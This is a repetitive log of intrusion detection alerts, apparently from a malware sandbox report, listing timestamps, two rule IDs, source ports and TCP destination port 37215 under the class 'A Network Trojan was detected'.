              Timestamp:06/13/24-21:32:30.128204
              SID:2835222
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131827
              SID:2829579
              Source Port:55658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787046
              SID:2829579
              Source Port:60076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154266
              SID:2829579
              Source Port:60744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323258
              SID:2829579
              Source Port:41602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725897
              SID:2835222
              Source Port:56572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354241
              SID:2835222
              Source Port:46400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175668
              SID:2829579
              Source Port:46326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404658
              SID:2835222
              Source Port:53446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240921
              SID:2829579
              Source Port:45054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677124
              SID:2829579
              Source Port:33802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729888
              SID:2835222
              Source Port:33530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758392
              SID:2829579
              Source Port:34932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168916
              SID:2829579
              Source Port:55198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670576
              SID:2835222
              Source Port:49704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655744
              SID:2835222
              Source Port:35308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631791
              SID:2829579
              Source Port:52364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935597
              SID:2835222
              Source Port:47144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.122968
              SID:2829579
              Source Port:41808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308617
              SID:2829579
              Source Port:59222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112269
              SID:2829579
              Source Port:38308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788477
              SID:2835222
              Source Port:47896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197825
              SID:2835222
              Source Port:37606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910280
              SID:2829579
              Source Port:45364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457860
              SID:2829579
              Source Port:39532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993753
              SID:2829579
              Source Port:38040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294576
              SID:2835222
              Source Port:45124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099410
              SID:2835222
              Source Port:43826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454229
              SID:2829579
              Source Port:37940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192385
              SID:2829579
              Source Port:43834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573129
              SID:2835222
              Source Port:47820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458567
              SID:2835222
              Source Port:34264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785814
              SID:2829579
              Source Port:55400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804536
              SID:2829579
              Source Port:36030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039213
              SID:2835222
              Source Port:37210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440831
              SID:2835222
              Source Port:39398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990200
              SID:2835222
              Source Port:33294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276594
              SID:2829579
              Source Port:46548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758606
              SID:2829579
              Source Port:60218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636249
              SID:2829579
              Source Port:47986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248341
              SID:2829579
              Source Port:40500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457060
              SID:2835222
              Source Port:59140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275008
              SID:2829579
              Source Port:51872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728528
              SID:2835222
              Source Port:45104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419414
              SID:2829579
              Source Port:40306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213732
              SID:2835222
              Source Port:54558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611551
              SID:2829579
              Source Port:53338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087876
              SID:2829579
              Source Port:58256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212628
              SID:2829579
              Source Port:51018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630311
              SID:2829579
              Source Port:42888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911311
              SID:2835222
              Source Port:36580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038244
              SID:2829579
              Source Port:56610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970341
              SID:2829579
              Source Port:50440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476159
              SID:2829579
              Source Port:56928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358605
              SID:2835222
              Source Port:53706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632218
              SID:2835222
              Source Port:33670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872125
              SID:2829579
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949872
              SID:2829579
              Source Port:48836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404898
              SID:2835222
              Source Port:41328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436561
              SID:2835222
              Source Port:40256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088821
              SID:2829579
              Source Port:54110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126898
              SID:2829579
              Source Port:42722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804004
              SID:2829579
              Source Port:51008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834362
              SID:2835222
              Source Port:49858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527511
              SID:2829579
              Source Port:43490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176655
              SID:2835222
              Source Port:53234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238345
              SID:2835222
              Source Port:33894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100712
              SID:2835222
              Source Port:44304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135586
              SID:2829579
              Source Port:40936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801288
              SID:2835222
              Source Port:42234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168435
              SID:2835222
              Source Port:60138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160955
              SID:2829579
              Source Port:55608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076141
              SID:2835222
              Source Port:58842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867376
              SID:2829579
              Source Port:56528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725665
              SID:2829579
              Source Port:43118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936209
              SID:2835222
              Source Port:34496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672846
              SID:2835222
              Source Port:49042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415783
              SID:2835222
              Source Port:51180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.199967
              SID:2829579
              Source Port:58542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438917
              SID:2829579
              Source Port:47022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870365
              SID:2835222
              Source Port:52814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258197
              SID:2829579
              Source Port:43086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488607
              SID:2835222
              Source Port:39110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101027
              SID:2835222
              Source Port:45826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238402
              SID:2829579
              Source Port:59708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630504
              SID:2829579
              Source Port:57722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988528
              SID:2835222
              Source Port:58956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787823
              SID:2829579
              Source Port:41400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266820
              SID:2835222
              Source Port:42742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409318
              SID:2829579
              Source Port:43130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786152
              SID:2829579
              Source Port:46904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356253
              SID:2835222
              Source Port:39996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222534
              SID:2829579
              Source Port:42226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630340
              SID:2835222
              Source Port:47846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841982
              SID:2829579
              Source Port:57016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477000
              SID:2835222
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102596
              SID:2835222
              Source Port:60416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440872
              SID:2829579
              Source Port:56394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508109
              SID:2835222
              Source Port:43300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057850
              SID:2835222
              Source Port:54744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377030
              SID:2835222
              Source Port:39450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505485
              SID:2835222
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546007
              SID:2835222
              Source Port:53928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229487
              SID:2829579
              Source Port:42950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221500
              SID:2835222
              Source Port:50366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154819
              SID:2835222
              Source Port:52568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091307
              SID:2829579
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943518
              SID:2829579
              Source Port:59654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731338
              SID:2829579
              Source Port:40260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.799895
              SID:2829579
              Source Port:60316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156528
              SID:2835222
              Source Port:42752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674800
              SID:2835222
              Source Port:56688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781277
              SID:2829579
              Source Port:60236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169272
              SID:2829579
              Source Port:47036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488456
              SID:2829579
              Source Port:58852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126395
              SID:2829579
              Source Port:59986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076570
              SID:2835222
              Source Port:48382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347840
              SID:2829579
              Source Port:50508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543070
              SID:2829579
              Source Port:41230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358268
              SID:2829579
              Source Port:32770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786579
              SID:2829579
              Source Port:52288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353473
              SID:2829579
              Source Port:55266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404290
              SID:2829579
              Source Port:49828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039445
              SID:2835222
              Source Port:40162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193876
              SID:2829579
              Source Port:41834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309214
              SID:2829579
              Source Port:33416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124559
              SID:2829579
              Source Port:56636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543929
              SID:2835222
              Source Port:56802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991182
              SID:2835222
              Source Port:56458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308257
              SID:2829579
              Source Port:35656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.225072
              SID:2835222
              Source Port:37566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257463
              SID:2829579
              Source Port:52544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277676
              SID:2829579
              Source Port:41140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316349
              SID:2829579
              Source Port:43952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507465
              SID:2829579
              Source Port:56282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248007
              SID:2835222
              Source Port:53112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211197
              SID:2829579
              Source Port:56792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834638
              SID:2835222
              Source Port:49052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045743
              SID:2829579
              Source Port:42918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885392
              SID:2829579
              Source Port:54990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804700
              SID:2835222
              Source Port:49464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076874
              SID:2829579
              Source Port:47832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787853
              SID:2829579
              Source Port:38154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457534
              SID:2829579
              Source Port:48618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567744
              SID:2835222
              Source Port:57966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786853
              SID:2835222
              Source Port:35428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940834
              SID:2835222
              Source Port:38310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221283
              SID:2835222
              Source Port:54460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909492
              SID:2835222
              Source Port:41402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993129
              SID:2829579
              Source Port:36060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374225
              SID:2829579
              Source Port:55666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607713
              SID:2835222
              Source Port:56828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573634
              SID:2829579
              Source Port:46388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404318
              SID:2829579
              Source Port:59206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440800
              SID:2835222
              Source Port:42974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106123
              SID:2835222
              Source Port:41044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137957
              SID:2835222
              Source Port:45068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199109
              SID:2835222
              Source Port:47792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660855
              SID:2829579
              Source Port:54162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195923
              SID:2835222
              Source Port:41780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155562
              SID:2829579
              Source Port:41474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509209
              SID:2829579
              Source Port:42324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439416
              SID:2835222
              Source Port:47022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422865
              SID:2829579
              Source Port:47016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755311
              SID:2835222
              Source Port:42922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610466
              SID:2829579
              Source Port:38606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555515
              SID:2829579
              Source Port:37736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240078
              SID:2835222
              Source Port:49630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.341227
              SID:2829579
              Source Port:57156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993235
              SID:2835222
              Source Port:46502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276964
              SID:2829579
              Source Port:42696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571518
              SID:2829579
              Source Port:53368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629534
              SID:2829579
              Source Port:52274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307481
              SID:2829579
              Source Port:51420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275208
              SID:2829579
              Source Port:39256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835778
              SID:2829579
              Source Port:39170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994121
              SID:2829579
              Source Port:56988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307652
              SID:2829579
              Source Port:35842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632286
              SID:2829579
              Source Port:47462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165773
              SID:2835222
              Source Port:40638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988087
              SID:2835222
              Source Port:54326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567508
              SID:2829579
              Source Port:46412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749130
              SID:2835222
              Source Port:59292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.986685
              SID:2835222
              Source Port:46528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.944124
              SID:2829579
              Source Port:54884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213975
              SID:2835222
              Source Port:48736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039707
              SID:2835222
              Source Port:58658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658725
              SID:2829579
              Source Port:57148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694181
              SID:2829579
              Source Port:35904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837001
              SID:2835222
              Source Port:49752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871206
              SID:2835222
              Source Port:37096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349588
              SID:2829579
              Source Port:53036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059580
              SID:2829579
              Source Port:52636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783429
              SID:2835222
              Source Port:44264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175527
              SID:2829579
              Source Port:38486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375351
              SID:2829579
              Source Port:52778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196326
              SID:2835222
              Source Port:60674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253083
